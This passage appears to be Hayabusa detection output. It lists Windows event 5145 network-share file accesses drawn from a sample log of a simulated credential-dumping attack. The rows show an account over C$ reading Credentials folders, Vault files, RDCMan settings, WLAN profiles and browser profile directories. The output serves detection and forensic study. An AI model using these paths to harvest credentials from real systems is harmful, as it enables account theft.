LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.666 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.666 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.666 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.682 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.682 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.718 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.562 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.577 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.593 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.593 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.624 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.624 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.640 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.720 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.720 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.720 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 